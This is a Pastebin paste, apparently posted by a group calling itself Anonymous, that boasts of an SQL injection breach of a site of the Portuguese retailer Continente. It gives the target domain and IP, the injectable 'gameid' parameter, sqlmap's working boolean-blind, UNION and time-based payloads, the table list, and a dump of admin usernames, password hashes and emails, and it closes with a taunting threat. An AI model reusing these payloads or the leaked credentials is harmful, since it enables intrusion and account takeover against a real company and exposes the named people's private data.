Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hello,
- We are Anonymous and We are Inside your System, We are Unexpected
- Continente Hipermercado - Portugal
- Target --> Security ---> 0
- domain: continente.pt
- cname: popota.continente.pt A 212.0.160.211
- Exploit: SQL |--===--- injection
- --
- Place: GET
- Parameter: gameid
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: gameid=popomemoria' AND 6231=6231 AND 'PYbW'='PYbW
- Type: UNION query
- Title: MySQL UNION query (NULL) - 11 columns
- Payload: gameid=popomemoria' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71696d7871,0x766f6364506c6552714d,0x7169767471),NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: gameid=popomemoria' AND SLEEP(10) AND 'UzRE'='UzRE
- ---
- web application technology: Apache
- back-end DBMS: MySQL 5.0.11
- available databases [2]:
- [*] continente_popota
- [*] information_schema
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: gameid
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: gameid=popomemoria' AND 6231=6231 AND 'PYbW'='PYbW
- Type: UNION query
- Title: MySQL UNION query (NULL) - 11 columns
- Payload: gameid=popomemoria' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71696d7871,0x766f6364506c6552714d,0x7169767471),NULL,NULL#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: gameid=popomemoria' AND SLEEP(10) AND 'UzRE'='UzRE
- ---
- web application technology: Apache
- back-end DBMS: MySQL 5.0.11
- available databases [2]:
- [*] continente_popota
- [*] information_schema
- Database: continente_popota
- [29 tables]
- +----------------------------+
- | admin |
- | admin_passatempo |
- | cities |
- | event_calendar |
- | event_gallery |
- | hypnotic_albums |
- | hypnotic_items |
- | hypnotic_media |
- | hypnotic_photos |
- | languages |
- | music_studio_gallery |
- | participation |
- | participations |
- | participations_1 |
- | participations_2014 |
- | pastime_cast_participation |
- | pastime_cast_vote |
- | product |
- | product_category |
- | score |
- | share |
- | tour_gallery |
- | tour_locality |
- | tranlations |
- | vote |
- | votes |
- | votes_1 |
- | votes_2014 |
- | zones |
- +----------------------------+
- -- Dump POC:
- Database: continente_popota
- Table: admin
- [3 entries]
- +----------+----------------------------------+------------+-----------------+---------------------+
- | admin_id | admin_pass | admin_user | admin_name | admin_email |
- +----------+----------------------------------+------------+-----------------+---------------------+
- | 1 | bd0a5b3695f1f7e0e719784aa497262d | havasww | Havas Worldwide | dev@havasww.com |
- | 2 | 28a862f30430f446dfc624ed978e1b3d | continen | Continente | geral@continente.pt |
- | 3 | 7a03631972e76b4adc845472a0bcc742 | idv | idv | idv |
- +----------+----------------------------------+------------+-----------------+---------------------+
- do not forget, make the wrong move, and we have your information... game over :P
- Player 2
- 8====D
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement